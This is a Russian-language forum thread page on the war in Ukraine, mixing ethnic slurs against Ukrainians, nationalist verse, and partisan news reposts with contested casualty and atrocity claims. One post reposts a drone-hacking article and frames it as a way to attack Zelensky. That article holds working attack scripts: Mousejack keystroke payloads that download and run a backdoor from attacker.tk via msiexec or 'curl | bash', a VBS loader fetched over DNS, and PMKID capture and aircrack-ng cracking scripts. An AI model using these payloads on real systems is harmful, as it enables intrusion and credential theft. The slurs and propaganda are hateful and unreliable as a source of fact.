GotAI.NET

Форум: Проблемы искусственного интеллекта

 

Регистрация | Вход

 Все темы | Новая тема Стр.315 (429)<< < Пред. | След. > >>   Поиск:  
 Автор Тема: На: Русские атаковали украинцев, это случилось!
гость
62.87.103.*
На: Русские атаковали украинцев, это случилось!
Добавлено: 05 июл 24 13:31
https://vz.ru/news/2024/7/5/1276399.html

Болгары нос по ветру держат. Решили сдать Украину.
Все хохлы знают что Болгария это рай для хохла.

Хотя бы потому что там все раку гонят в каждом хозяйстве в промышленных масштабах и потом сами же все выпивают. Постоянно бухие. То что хохлам и нужно.
[Ответ][Цитата]
IvanVlashkіn1976
Сообщений: 206
На: Русские атаковали украинцев, это случилось!
Добавлено: 05 июл 24 23:58
Цитата:
Автор: гость
В таком деле нужна голова
Никогда не воюйте с одним противником слишком долго – он приноровится к вашей тактике.
[Ответ][Цитата]
IvanVlaskin1976
Сообщений: 13973
На: Русские атаковали украинцев, это случилось!
Добавлено: 06 июл 24 17:54
Изменено: 06 июл 24 18:47
Я - русский (а) Владимир Кобец

Я - русский. Я тот самый "колорад".
Совдеповский отстой, рашист и вата.
Я тот, кто любит водку и Парад,
я - отпрыск победившего солдата.

Я самый натуральнейший москаль,
воспитанный на "мама мыла раму".
Я тот, кому детей донецких жаль,
кто сердцем не приемлет эту драму.

Не радуйтесь. Мы - не перевелись.
Нас много - не привыкших жрать от пуза.
Нам человечность прививала жизнь
в палатах умиравшего Союза.

Мы выжили, конечно же, не все.
Но выжившие - стали крепче стали.
Мы - русские - трёхкратно обрусев,
из праха вашей совести восстали...

Для нас святое - Родина и мать,
нас мир боится, потому, что знает:
Кому "умом Россию не понять",
тому она привычно объясняет,

Что есть на свете, окромя жратвы,
порядочность, достоинство, и совесть.
И наше, русское "иду на вы" -
для вас, тупых, увы, плохая новость.

"Не трогайте Россию, господа."
Запомните: нас бьют, а мы - мужаем.
Услышьте нас. А если нет, тогда
нагрянет смерть за новым урожаем...

На вшивость нас не стОит проверять,
Американец, ты не есть мессия.
Подумай, брат: не Сирия, РОССИЯ.
Подумай, и не трогай нашу мать.
[Ответ][Цитата]
IvanVlaskin1976
Сообщений: 13973
На: Русские атаковали украинцев, это случилось!
Добавлено: 06 июл 24 18:29
Изменено: 06 июл 24 18:49
Как передать наилучшие пожелания главарю укропской шайки Зеленскому -

https://ai-news.ru/2024/07/megadron_stroim_hakerskij_bespilotnik_dalnobojnyj_i_s_zashitoj_ot_glushilok.html
Мегадрон. Строим хакерский беспилотник — дальнобойный и с защитой от глушилок. Часть 2
2024-07-06 14:24

Чтобы полетный контроллер знал, откуда брать команды управления двигателями, в его настройках нужно указать, что NanoPi физически соединен с его интерфейсом UART2, а программно используется протокол MSP. Для Betaflight cделать это можно с помощью программы BetaflightConfigurator, как показано на следующих рисунках.


Меняем активный UART для приемника (NanoPi подключен к UART2 полетного контроллера, а штатный приемник — к UART1)

В параметрах приемника указываем протокол управления MSP
Если все сделано правильно, то с любого расстояния появится возможность удаленно управлять таким дроном, пока есть сигнал мобильных сетей и, конечно же, пока не сел аккумулятор.

Передавать видео можно, подсоединив DVP-камеру напрямую к плате NanoPi. А стрим картинки с нее по сети возможен посредством следующего кода:

cvlc v4l2:///dev/video0:chroma=h264:width=800:height=600 --sout '#transcode {vcodec=h264,acodec=mp3,samplerate=44100}:std{access=http,mux=ffmpeg{mux=flv},dst=0.0.0.0:8080}' –vvv

Чтобы удаленно видеть картинку с дрона на любом расстоянии, нужно просто открыть в браузере «http://drone:8080/», где drone — IP-адрес VPN NanoPi.

Приведенные выше шаги реализации управления дроном через мобильные сети — это лишь концепт, демонстрирующий все необходимые примитивы связей. Чтобы дрон реально полетел и не разбился, требуется реализовать еще удобный интерфейс управления.

Этого можно добиться через подключение пульта, например EdgeTX, способного работать как HID-устройство. А также через трансляции положений его стиков в команды управления, которые передаются по сети на NanoPi, интерпретируются там в соответствующие MSP-команды и по UART попадают на полетный контроллер.

А можно пойти более универсальным способом, позволяющим управлять полетом без специального оборудования, прямо с клавиатуры ноутбука или экрана телефона. Это проще всего реализовать через небольшое веб?приложение, средствами JavaScript, считывая соответствующие события клавиатуры и нажатия по виртуальным стикам в сообщения, оперативно передаваемые по сети через WebSockets на NanoPi.

Для систем под управлением Ardupilot существуют даже готовые решения.

Защита от глушилок

Проблему помех от зданий и ограниченного радиуса управления можно решить представленными выше способами, превратив вышки сотовой связи из главного источника помех в лучшего друга.

Но для дронов есть еще одна опасность, которая их может поджидать непосредственно на самих объектах, — это подавители дронов, или глушилки.

Для большинства подобных устройств must-have является подавление частот 2,4 ГГц, на которых летает большинство простых дронов (с управлением по Wi-Fi). Сюда же попадает часть частот и профессиональных дронов. У серьезных глушителей дронов в частотах подавления учтены каналы управления всех профессиональных протоколов (TBS, ELRS, FRSKY и прочих) — 800, 900, 2400 МГц.

Однако самая распространенная мера противодействия дронам — глушение или спуфинг сигналов GPS. Подделав сигналы со спутников, дрону можно внушить любое местоположение, что может быть использовано для контроля над его перемещением. Так как в достаточно многих протоколах управления дронами применяется серьезное шифрование, вполне логичной выглядит атака на GPS, так как она представляется наиболее общей. Поэтому GPS-приемник оказывается еще одним слабым местом дронов. И потенциальный злоумышленник, не желающий, чтобы его дрон был сбит такой глушилкой, должен избавиться от GPS.

В некоторых «готовых» моделях дронов бортовой GPS можно отключить программно. FPV-дроны Cinewhoop часто используются в полетах по помещениям, где, как известно, GPS практически не ловится. Поэтому часто GPS-приемники в такие модели не ставят. Дроны с открытыми системами управления, такими как Betaflight, имеют модульную структуру и всегда позволяют как включить, так и отключить бортовой GPS, чего нельзя сказать о более бюджетных вариантах, которые просто отказываются лететь без него.

Что касается глушения каналов управления, то заглушить дрон с управлением по мобильным сетям тоже не так?то просто. Ведь теперь нужно подавлять сразу ряд диапазонов мобильных сетей разных поколений. А вариантов частот у 2G, 3G и 4G немало. Если заглушить все 4G-сети (1900, 2300, 2500, 2600 МГц), модем дрона перейдет на 3G (800, 850, 900, 1900, 1800, 2100, 2600 МГц), заглушаем и их — перейдет на 2G (900, 1800, 1900 МГц).

Тем не менее существуют направленные радиопушки, отключающие мощным импульсом вообще все радио, но им, впрочем, требуется достаточно точное наведение на цель.

PINEAPPLE

Время поподробнее рассмотреть сами атаки. Для хакера дрон лишь транспорт. Реально все атаки злоумышленник может проводить с помощью некоторого миниатюрного устройства, прикрепленного к такому дрону. Это может быть уже знакомый по предыдущей статье Pineapple. Он без проблем поместится на любой дрон, ведь он маленький и легкий.


Легковесная реализация Pineapple превращает дрон в хакерский инструмент
Так как этот хакерский девайс может доставляться на место хоть дроном, хоть почтовым голубем, то важна его масса. Суммарно масса такого Pineapple вместе с аккумулятором получается всего от 17 до 43 г, в зависимости от типа батареи. Дроны имеют запас мощности для противодействия ветру и установки экшн?камер и спокойно могут поднять от трети до половины своей изначальной массы без значительной потери летных характеристик. Так что с таким грузом справится почти любой, даже карманный селфи?дрон. И это еще одно несомненное преимущество перед громоздким готовым устройством Pineapple от hak5 — его сможет поднять далеко не каждый дрон.

Молниеносность — это главное условие, которое потенциальный злоумышленник учитывает при планировании атак с дрона. Если в предыдущей статье про Pineapple рассмотрены статичные атаки на беспроводные сети, когда требуется долго находиться в неподвижной точке, то с дроном целесообразнее проводить динамичные атаки — быстрые и мобильные, покрывающие множество целей.

Но какие беспроводные технологии могут быть атакованы столь стремительно, что у дрона не успеет сесть аккумулятор? Вполне очевидно, что это должны быть атаки, слабо завязанные на людей, так как людям часто требуется много времени, чтобы принять решение. Другое дело — чисто компьютерные атаки, не требующие никакого участия пользователя. Машины не так медлительны, как человек, и есть несколько zero click атак, проведение которых занимает несколько секунд. При этом дрону не нужно даже совершать коротких остановок — все может происходить прямо во время полета.

Далее представлено несколько таких атак, начиная с самых критичных.

Mousejack

Существует распространенная уязвимость, надежно, на десятилетия засевшая в сотнях тысяч беспроводных мышек и клавиатур. Ее эксплуатация возможна с кинематографичной эффективностью — высочайшей скоростью (одна?две секунды) и максимальным импактом — RCE, и атакующий сразу получает шелл. И имя ей — Mousejack.

Атака на беспроводные HID-устройства (мыши и клавиатуры) — это, пожалуй, самая зрелищная атака, способная скомпрометировать компьютер за секунды. Она считается самой опасной из всех возможных атак, так как позволяет минимальными усилиями, по радиоканалу, удаленно отправить произвольные нажатия клавиш, иными словами, выполнить произвольный код. Никаких предварительных подборов паролей, особых действий пользователя — сразу RCE.

Эту атаку можно эффективно проводить с помощью специального устройства CrazyRadio PA и любого одноплатника, например Raspberry, или уже знакомого нам устройства Pineapple, разработанного специально для атак на беспроводные сети. Условие старта для атаки может быть добавлено так:

startup.sh

...

elif lsusb | grep -q 'Nordic Semiconductor'; then

echo "[*] mousejack attack"

cd mousejack

screen -dmS mousejack -t jackit -L -Logfile "$time-mousejack-%n.log" './mousejack.sh'

cd -

...

Иными словами, если в Pineapple вставлен донгл CrazyRadio PA, то автоматически запускается атака на беспроводные мыши и клавиатуры:

mousejack/mousejack.sh

#!/bin/bash

led green on

python3 jackit --autopwn --script ducky.txt

led green off

Так как атакующий не знает адреса беспроводных устройств, он вынужден атаковать все, что слышит в радиоэфире, поэтому используется флаг autopwn.

Если соединить CrazyRadio с Pineapple, получится очень опасное хакерское устройство.


Устройство, способное на расстоянии взломать компьютер через беспроводную периферию
Дрон с таким устройством сможет пробить периметр практически любой компании.


Дрон заряжен Mousejack и готов лететь
Такой дрон будет атаковать все устройства вокруг себя, пока летит.

Эксплуатация Mousejack очень похожа на BadUSB-hid. Тут атакующий сталкивается с теми же проблемами при наборе команд:

при использовании нажатий клавиш приходится угадывать языковую раскладку;
при использовании ALT-кодов для набора текста команд (возможно только на Windows) — угадывать статус клавиши Num Lock.
И в том и в другом случае злоумышленнику придется для надежности засылать нажатия дважды, меняя либо раскладку, либо статус NumLock. Но в случае с ALT-кодами понадобится в три?четыре раза больше нажатий. А если нет разницы, то зачем передавать больше? В общем, тут снова рациональнее использовать простой метод отправки нажатий непосредственно самих клавиш вместо их кодов:

mousejack/ducky.txt

GUI SPACE

GUI r

DELAY 300

STRING msiexec /i https://en.attacker.tk/backdoor.msi /quiet

DELAY 300

ENTER

SHIFT ALT

DELAY 300

SHIFT CTRL

DELAY 300

GUI r

DELAY 300

STRING msiexec /i https://ru.attacker.tk/backdoor.msi /quiet

DELAY 300

ENTER

Так как используется радиоканал, атакующий неизбежно столкнется с помехами. Чем длиннее набираемая команда, тем больше вероятность, что та или иная клавиша «не долетит». Достаточно всего одной ошибки, чтобы RCE-команда не распозналась.

Приведенный здесь пример уже знаком читателям по статье про BadUSB-hid. Эта возможность имеется в любой ОС Windows, она позволяет за одно действие скачать и запустить указанную программу удаленного управления. Под ОС семейства Unix злоумышленник может использовать команду из разряда curl -L http://rce.attacker.tk/1.sh|bash.

Далее успешность атаки зависит только от ловкости управления дроном и наличия беспроводных мышек в радиусе около 10–15 м. Pineapple на дроне будет пытаться взломать каждый компьютер через вновь пойманный радиосигнал от мышки или клавиатуры. Эффект атаки делает ее похожей на фильм или игру про хакеров, где взлом с помощью дрона происходит за несколько секунд.


Скриншот из компьютерной игры Watch Dogs 2
Реальный мир отличается от вымышленного. Большая часть из того, что показано в играх и фильмах о возможностях хакеров, имеет мало общего с реальностью, но эта атака — одна из немногих, которые в жизни выглядят точно так же, как на экране.

Представь: ты сидишь дома или работаешь в офисе, где?нибудь на верхних этажах или в глубине режимного объекта, в сотнях метров от охраняемого контрольно?пропускного пункта. Кажется, что ты в полной информационной безопасности и внешний нарушитель до тебя не доберется. Но тут к зданию подлетает подобный дрон, и, пока ты удивленно смотришь на него через окно (а возможно, ты даже и не заметишь его вовсе), он всего за секунду запустит вредоносный код на твоем компьютере. Так что ты вряд ли успеешь заметить что?либо подозрительное, а если и заметишь, то вряд ли сопоставишь появление в небе дрона с установкой бэкдора на твоем компьютере. С использованием этого метода злоумышленник сможет проникнуть в корпоративную сеть — последствия этого, думаю, объяснять никому не нужно.


Пробив периметра с дрона за одну секунду
Дрон использует еще и эффект отвлечения: пользователь смотрит в окно, пока на его ноутбуке на долю секунды всплывает окно «Пуск ? Выполнить» и запускается бэкдор или RAT. Через пару минут, вероятно, злоумышленник уже успеет опробовать пару?тройку эксплоитов.

По иронии судьбы чаще всего беспроводные мышки и клавиатуры есть либо у IT-персонала, либо у руководителей. Так что добыча злоумышленника будет сразу весомая. Возможно, это окажется комп доменного администратора, в таком случае события уже во внутренней сети будут развиваться стремительно. А возможно, это будет какой?то начальник, на рабочем столе которого много ценных файлов. Словом, какой бы компьютер это ни был, он, скорее всего, подключен к внутренней сети, а значит, злоумышленник почти наверняка достигнет главной цели — пробития периметра.

Чтобы пробить периметр описанным способом, с компьютера, подверженного этой атаке, должен быть выход в интернет до опорного сервера злоумышленника. Оттуда он скачивает и запускает бэкдор, на который потом поступают команды управления. Но далеко не в каждой внутренней сети разрешены прямые соединения на внешние IP-адреса. Однако популярные методы эксфильтрации, такие как DNS, вполне могут работать, и произвольные запросы, содержащие данные, могут выходить из сети наружу почти всегда. Это значит, что такой канал может быть использован как транспорт для скачивания бэкдора и его последующей работы.

Реализовать загрузку нужной хакеру программы по DNS можно и базовыми средствами любой ОС. Например, для Windows самым переносимым способом является VBS-скрипт, который написан на полноценном интерпретируемом языке программирования (смотри статью про методы инфильтрации и эксфильтации). Но размер вводимой в окно «Выполнить» команды ограничен, и для набора VBS-скрипта, загружающего средство удаленного управления через DNS, злоумышленнику потребуются минимум три команды:

mousejack/ducky-dnsexec.txt

GUI r

DELAY 300

STRING cmd /C "(echo On Error Resume Next& echo Set objShell = CreateObject^("WScript.Shell"^)& echo Set writer = CreateObject^("Scripting.FileSystemObject"^).createtextfile^("out.exe"^))>1.vbs& ping x1.attacker.tk"

ENTER

GUI r

DELAY 300

STRING cmd /C "(echo For d = 1 To 927& echo pos = 0& echo While pos = 0& echo Set exec = objShell.Exec^("nslookup -type=txt d"^&d^&".txt.attacker.tk"^)& echo res = exec.Stdout.ReadAll^(^))>>1.vbs& ping x2.attacker.tk"

ENTER

GUI r

DELAY 300

STRING cmd /C "(echo pos = inStr^(1,res,"?"^)& echo txt = Mid^(res,pos+1,253^)& echo Wend& echo For b = 0 To Len^(txt^)/2-1& echo writer.Write Chr^(CInt^("^&H" ^& Mid^(txt,1+b*2,2^)^)^)& echo Next& echo Next)>>1.vbs& ping x3.attacker.tk"

ENTER

GUI r

DELAY 300

STRING cmd /C "wscript 1.vbs & out.exe"

ENTER

При выполнении команд на сервер злоумышленника должно прийти три DNS-отстука, означающих успешность набора команд.

Это отличный пример того, как ты или твоя компания могут быть легко взломаны, причем даже без дрона (об этом в одной из следующих статей). И чем больше компания, тем выше вероятность встретить подверженную уязвимостям беспроводную периферию. Мой опыт показывает: несмотря на то что эта уязвимость найдена еще в 2016 году, о ней до сих пор мало кто знает. А те, кто знает, сильно ее недооценивают. Тем не менее встречается она повсеместно. А аппаратная специфика этой уязвимости обеспечивает ей еще достаточно долгую жизнь, ведь компьютерные мышки мы не привыкли менять так же часто, как телефоны.

Атака EAP

В статье про Pineapple уже рассматривались атаки на WPA Enterprise, но там описано возможное их применение в статичном режиме — с ожиданием попадания клиентов в радиус действия. С дроном хакер может провести такую атаку в ином ключе — динамично, самостоятельно обнаруживая и атакуя клиентские устройства.

Теперь он в состоянии облететь каждое здание, где размещаются цели атак. Так как отправка учетных данных WPA Enterprise не требует участия пользователя, она происходит достаточно быстро, что делает эту атаку возможной даже без остановки пролетающего мимо дрона.

На представленной ниже иллюстрации телефоны сотрудников бессознательно кинули в пролетающий мимо дрон учетные записи корпоративной беспроводной сети.


Компьютерная атака с дрона на клиентское устройство
Для реализации такой атаки злоумышленнику не нужно дорабатывать скрипты Pineapple. Все необходимое уже проделано в соответствующем разделе предыдущей статьи. Для активации атаки на Pineapple просто ставится перемычка на GPIO-25 (замыкающая пины 20 и 22), после чего устройство включается. Загорелся зеленый светодиод — значит, точка доступа поднялась и атакующий может лететь. Дрон вместе с устройством прилетает обратно, горит красный или желтый светодиод — значит, мы вернулись не с пустыми руками и пароль или хеш чьей?то доменной учетки сохранен на карте памяти. С этой доменной учеткой злоумышленник впоследствии может получить удаленный доступ к почте и раскрыть конфиденциальные данные или даже, при наличии у компании VPN, получить доступ в ее локальную сеть.

Захват хендшейка WPA и PMKID

В предыдущей статье про Pineapple рассмотрен ряд атак на аутентификацию Wi-Fi. Аутентификация (захват PMKID) и деаутентификация (захват WPA Handshake) происходят достаточно быстро. Более того, если захват WPA Handshake требует определенных обстоятельств (наличия клиентов), то захватить PMKID, если имеется уязвимая точка доступа, можно всегда и достаточно быстро.

PMKID — это еще один пригодный для брутфорса хеш, который можно получить из первой части четырехступенчатого рукопожатия (EAPOL M1). Для этого не нужны аутентифицированные клиенты, такой пакет точка доступа может отправить атакующему сама в ответ на запрос ассоциации:

wpapsk/auth.sh

#!/bin/bash

dumpfile="pmkid-$(date +'%H:%M:%S_%d.%m.%Y')"

hcxdumptool -i mon0 --enable_status=7 -o $dumpfile.pcapng --disable_client_attacks --disable_deauthentication $* | while read line

do

if echo "$line" | grep -q 'PMKIDROGUE:'; then

led yellow on 2> /dev/null

fi

done

tcpdump -r $dumpfile.pcapng -nn -w $dumpfile.pcap

rm -f $dumpfile.pcapng

Пока дрон летит, этот скрипт отправляет запрос ассоциации на каждую точку доступа в пределах досягаемости радиосигнала.


Компьютерная атака с дрона на точку доступа
Как только PMKID захвачен, загорается желтый светодиод. И WPA handshake, и PMKID дает хеш?сумму, по которой можно восстановить пароль к точке доступа методом перебора по словарю:

wpapsk/brute-pmkid.sh

#!/bin/bash

while sleep 60

for pcap in *.cap

do echo "$pcap"

hcxpcapngtool "$pcap" --pmkid=/tmp/m1.pmkid

hcxhash2cap --pmkid=/tmp/m1.pmkid -c /tmp/out-pmkid.pcap

for bssid in $(echo 0 | aircrack-ng "/tmp/out-pmkid.pcap" | grep 'with PMKID' | awk '{print $2}')

do

if [ -f "/tmp/$bssid" ]; then

continue

fi

touch "/tmp/$bssid"

aircrack-ng -w /home/pi/wpapsk/passwords_top1k.txt -b "$bssid" "/tmp/out-pmkid.pcap" -l "$bssid.txt"

if [ -s "$bssid.txt" ]; then

led red on 2> /dev/null

exit

fi

done

rm -f /tmp/m1.pmkid

rm -f /tmp/out-pmkid.pcap

done

done

Pineapple с таким скриптом в состоянии сам определить слабые пароли к точкам доступа. Для этого сначала удаляются все пакеты EAPOL M2 (handshake), так как проверяются только с PMKID. После их уникализации, чтобы не брутить одни и те же хеши многократно, запускается уже брутфорс прямо в воздухе. Если пароль подобран, загорается красный светодиод.

Скрипт служит хорошим примером манипуляции набранными хешами, ведь в таком случае aircrack-ng при наличии handshake игнорирует PMKID. Вообще, брутить хеши целесообразно на более мощном оборудовании, ведь все собранные в полете хеши сохраняются на карте памяти Pineapple.

Разведка беспроводных сетей

Применительно к атакам на беспроводные сети дрон весьма неплохо подходит на роль разведчика. Разместив все тот же Pineapple и подключив к нему внешний GPS-донгл, атакующий может триангулировать расположение каждого беспроводного устройства (точек доступа Wi-Fi, клиентов, Bluetooth-устройств и даже беспроводных мышек и клавиатур) и фиксировать их расположение на карте. Эта информация может быть очень актуальна как для атакующего, выявляющего поверхность будущих атак, так и для защитников, контролирующих свои ресурсы. Ведь весь необходимый сбор данных и расчеты полностью производит программа Kismet. На выходе — дамп SQLite, удобный для самостоятельного парсинга.

Для географической разведки беспроводных сетей требуется лишь два компонента, которые на Pineapple запускаются при старте в положении перемычки на 27-м GPIO:

startup.sh

...

elif jmp 27; then

echo "[*] wi-fi recon (dynamic)"

monitor_enable

cd recon

screen -dmS recon -t gpsd -L -Logfile "$time-recon-%n.log" './gps.sh'

screen -r recon -t kismet -X screen './kismet.sh'

screen -r recon -t tcpdump -X screen './tcpdump.sh'

cd -

...

Когда устанавливается соединение со спутниками, зеленый светодиод дает понять, что можно лететь:

recon/gps.sh

#!/bin/bash

gpsd -N /dev/ttyACM0 -D 5 | while read line

do echo "$line"

if echo "$line" | fgrep -q 'GPS:'; then

led green on 2> /dev/null

fi

done

Успешный запуск Kismet, в свою очередь, зажигает желтый светодиод:

recon/kismet.sh

#!/bin/bash

kismet -c mon0 | while read line

do echo "$line"

if echo "$line" | fgrep -q 'success'; then

led yellow on 2> /dev/null

fi

done

Теперь после облета территории или даже загрузки GPS-маршрута в дрон атакующий либо защитник могут в автоматическом режиме более качественно выполнить анализ беспроводных сетей, покрывая максимум территории. Полученный дамп может быть преобразован в веб?страницу, содержащую удобную интерактивную карту, на которой наложено рассчитанное местоположение источников сигнала, а также построена тепловая карта сигналов, как на следующем рисунке.


Визуализация собранной информации о беспроводных устройствах (местоположение и тепловая карта)
Тепловая карта показывает уровень сигнала от беспроводных устройств в каждой исследованной точке. Любая точка доступа или клиент на такой карте по клику мышкой обводится окружностью, показывающей область ее слышимости.


Область слышимости беспроводного устройства
При этом тепловая карта, как можно заметить, перестраивает свой цвет под каждое выбранное беспроводное устройство, тем самым показывая, в каких местах и как принимался сигнал от него. Каждая область, где пролетал дрон, при выборе мышкой показывает беспроводные устройства, доступные именно там.


Слышимые беспроводные устройства в определенной точке
Все вместе это дает представление, не выходит ли зона приема за контролируемую область, где может находиться злоумышленник.

Постэксплуатация

Если атака будет успешной, злоумышленнику, вероятно, придется вернуться и воспользоваться обнаруженной уязвимостью. Ведь подобранный пароль или перехваченные учетные данные сработают только для конкретной беспроводной сети. В таком случае дрон может доставить Pineapple, снабженный 4G-модулем для удаленного подключения к беспроводной сети на охраняемой территории.


Дрон доставляет Pineapple, снабженный 4G-модемом, для удаленного доступа
Как использовать Pineapple в качестве средства удаленного доступа, продемонстрировано в предыдущей статье.

Дрон с Pineapple на борту может приземлиться на крышу здания. С выключенными пропеллерами он в состоянии ожидать достаточно долго. А тем временем злоумышленник может удаленно подключиться к скомпрометированной беспроводной сети и развивать дальнейшие атаки уже по внутренним сетям. И вполне вероятно, что внутренняя сеть в результате такого проникновения падет раньше, чем на крышу поднимутся сотрудники службы безопасности. Впрочем, в таком случае дрон может стремительно улететь, унеся на своем борту и Pineapple, и 4G-модем. Так что не останется никаких следов.

КАК ЗАЩИТИТЬСЯ

Дрон способен преодолеть множество классических защитных мер. Пропускной пункт, двери на этаже или в кабинете, даже заборы для него не проблема. И чем крупнее компания, тем выше вероятность встретить уязвимый компонент и тем весомее потенциальная добыча злоумышленника.

Можно рассмотреть следующие варианты защиты от некоторых дронов:

одна из тактик защиты — это нападение. Дрон, управляемый по Wi-Fi, — это, по сути, летающий роутер. К нему можно подключиться, как к обычной Wi-Fi-сети, используя простые заводские пароли, после чего перехватить видеосигнал, идущий RTSP-потоком, или перекрыть канал управления;
применение обычных подавителей дронов, так как они рассчитаны на наиболее популярные протоколы (FRSKY, ELRS или TBS), по которым управляются даже профессиональные дроны;
многие дроны после потери сигнала с пульта управления экстренно садятся, но некоторые улетают обратно по GPS-координатам. Подавители радиосигналов, сообщающих поддельные координаты, могут заставить дрон экстренно сесть в заданной точке;
для модифицированных дронов с самодельными режимами управления (например, 4G) можно использовать
[Ответ][Цитата]
IvanVlaskin1976
Сообщений: 13973
На: Русские атаковали украинцев, это случилось!
Добавлено: 06 июл 24 18:30
одна из тактик защиты — это нападение. Дрон, управляемый по Wi-Fi, — это, по сути, летающий роутер. К нему можно подключиться, как к обычной Wi-Fi-сети, используя простые заводские пароли, после чего перехватить видеосигнал, идущий RTSP-потоком, или перекрыть канал управления;
применение обычных подавителей дронов, так как они рассчитаны на наиболее популярные протоколы (FRSKY, ELRS или TBS), по которым управляются даже профессиональные дроны;
многие дроны после потери сигнала с пульта управления экстренно садятся, но некоторые улетают обратно по GPS-координатам. Подавители радиосигналов, сообщающих поддельные координаты, могут заставить дрон экстренно сесть в заданной точке;
для модифицированных дронов с самодельными режимами управления (например, 4G) можно использовать направленные подавители сигналов.
Среди общих мер, которые защищают от любых дронов, можно отметить следующие:

экранирование — размещение критических объектов в помещениях со специальными ограждающими конструкциями, которые препятствуют распространению электромагнитных излучений за пределы помещения (контролируемой зоны);
внешнее зашумление электромагнитными волнами, которые не позволяют дрону обнаружить уязвимые беспроводные устройства;
контроль физического доступа в пределах радиуса действия беспроводных устройств — поскольку дрон главным образом направлен на обход физических барьеров, а не технических уязвимостей, защиту от него можно рассматривать в том же ключе;
размещение критических объектов вдали от внешних ограждающих конструкций — в глубине защищенного здания или под землей.
Читайте ещё больше платных статей бесплатно: https://t.me/xakep_1


Источник: telegra.ph
[Ответ][Цитата]
IvanVlashkіn1976
Сообщений: 206
На: Русские атаковали украинцев, это случилось!
Добавлено: 06 июл 24 22:51
Президент США Джо Байден заявил, что именно он является тем, "кто остановил" правителя РФ Владимира Путина.

Во время интервью Байден назвал поддержку Украины и объединение более 50 союзников вокруг помощи Украине одним из главных достижений времен своего президентства.

Он также настаивал, что находится в хорошей форме и сможет победить Дональда Трампа на президентских выборах.

На вопрос ведущего, не хотел бы он пройти независимое медицинское обследование, которое включало бы неврологические и когнитивные тесты, Байден ответил, что "каждый день" проходит когнитивный тест.

"Все, что я делаю. Вы знаете, я не только провожу кампанию, я управляю миром. Пусть это не звучит гиперболизировано, но мы – самая важная нация мира... Я тот, кто объединил НАТО. Никто не думал, что я смогу его расширить. Я тот, кто остановил Путина".
[Ответ][Цитата]
IvanVlaskin1976
Сообщений: 13973
На: Русские атаковали украинцев, это случилось!
Добавлено: 07 июл 24 4:03
Ещё живой человек в Буче когда ехали Вооружённые Силы Украины:
https://www.youtube.com/watch?v=Fvmv3nZmluo

https://aif.ru/politics/world/-my-byli-sudom-cheshskiy-naemnik-vsu-priznalsya-v-rasstrele-lyudey-v-buche
«Мы были судом». Чешский наемник ВСУ признался в расстреле людей в Буче
06.07.2024 12:17

Чешский боевик Филипп Симан, которого в Чехии судят за наемничество в рядах Вооруженных сил Украины (ВСУ), признался, что расстреливал людей в Буче. Об этом со, ссылкой на чешские СМИ сообщает беглый украинский блогер Анатолий Шарий.

Расстрельная команда
Симан приехал на Украину в 2022 году, чтобы заработать денег, воюя за киевский режим. Судя по всему, наемник, в том числе, исполнял роль карателя.

«Мы были полицией, мы были судом, мы были и расстрельным отрядом, раз уж на то пошло», – цитирует «солдата удачи» Шарий в своем Telegram-канале. Кроме того, Симан признался, что снимал с убитых золотые украшения, потому что «так делали все».

По данным чешских СМИ, Симан вступил в украинский добровольческий батальон «Карпатская Сечь» в конце марта 2022 года, не имея на это права. Дело в том, что в Чехии для вступления в иностранный легион военный должен получить от президента специальное разрешение воевать в армии другого государства.

Наемник сумел избежать гибели и вернуться на родину, где и предстал перед судом. В качестве «трофеев» чех привез из Украины очки Gucci, дыхательную маску из самолета и слитки золота и серебра, а также другие драгоценности.

Добавим, что за наемничество Симана могут осудить максимум на пять лет. Но вот за мародерство ему грозит вплоть до пожизненного срока. Пока, как пишет пресса, наемник не признает своей вины.

Бандиты, повязанные кровью
Киевский режим постоянно использует иностранных наемников для исполнения карательных функций, считает военный аналитик, полковник в отставке Виктор Литовкин.

«Конечно они их так используют. Это же бандитский режим. А у бандитов все должны быть повязаны кровью. Вот Киев и марает в крови этих дураков, которые едут на Украину за большими деньгами», – отметил эксперт в разговоре с aif.ru.

При этом добиваться выдачи чешского бандита в Россию, чтобы судить здесь, по мнению Литовкина бесполезно. «Он гражданин Чехии, никто его не выдаст», – подчеркивает полковник в отставке.
[Ответ][Цитата]
IvanVlashkіn1976
Сообщений: 206
На: Русские атаковали украинцев, это случилось!
Добавлено: 07 июл 24 6:01
Смерть, конечно, хохочет, слушая путина и его пропаганду.
Причины веселья понятны. Смерть уже лет сто никто так смешил.

Сегодня Tne Economist, ссылаясь на детально-документальные отчеты Минобороны США, опубликовал реальные цифры потерь РФ.
Согласно этим данным, россия, по состоянию на июнь 2024 года потеряла убитыми и тяжелоранеными от 462.000 до 728.000 человек.
Это существенно превышает все военные потери РФ после Второй Мировой.

Есть и обоснованный прогноз:
Продолжение войны, (при разных сюжетах ее ведения) обойдется РФ , (примерно), от полутора, до пяти миллионов смертей.
Важно понимать то, что
отделы Пентагона, изучающие войну в Украине, это - феноменальные зануды.
Это холодные военспецы, чуждые всякой политике и пропаганде.
Это легионы безликих «считал», аналитиков, экспертов и спецов, которые по молекулам собирают все данные с войны.
Они делают это не для прессы и не для заявлений президентов, а исключительно для
знания того «что такое современная война и как ее вести наиболее эффективно».
[Ответ][Цитата]
IvanVlaskin1976
Сообщений: 13973
На: Русские атаковали украинцев, это случилось!
Добавлено: 07 июл 24 9:07
Изменено: 07 июл 24 9:27
https://t.me/radiosvoboda/59426
Радио Свобода / Radio Svoboda (ru)
Apr 12 at 23:58

50 471 имя российских военнослужащих, погибших к 12 апреля в Украине, удалось установить журналистам Би-би-си и "Медиазоны" совместно с командой волонтёров. Это только те, о чьей смерти стало известно из открытых источников. Реальное количество потерь может быть намного выше, утверждают расследователи.

С момента прошлой сводки две недели назад список погибших пополнили 1190 фамилий. Команды аналитиков, которые подсчитывают потери военной техники, сообщают, что в последние несколько недель Россия теряет большое количество танков, БТР, БМП и артиллерии.

К 12 апреля подтвердилась гибель за всё время войны более 3 300 офицеров российской армии и других силовых структур. 390 из них – в звании от подполковника и выше.

Приведённые цифры – это только те потери, о которых сообщали чиновники, СМИ, родственники погибших, а также данные с кладбищ. Недавно расследователи начали применять и другой метод оценки избыточной мужской смертности, основанный на данных реестра наследственных дел. Такой метод подсчёта выдаёт цифру в примерно 85 тысяч погибших россиян с начала войны в Украине в феврале 2022 года.

==========
https://mo.tsargrad.tv/news/izrailskaja-razvedka-ocenila-poteri-ukrainy-i-rossii-v-hode-konflikta-10-k-1_720458
ИЗРАИЛЬСКАЯ РАЗВЕДКА ОЦЕНИЛА ПОТЕРИ УКРАИНЫ И РОССИИ В ХОДЕ КОНФЛИКТА: 10 К 1
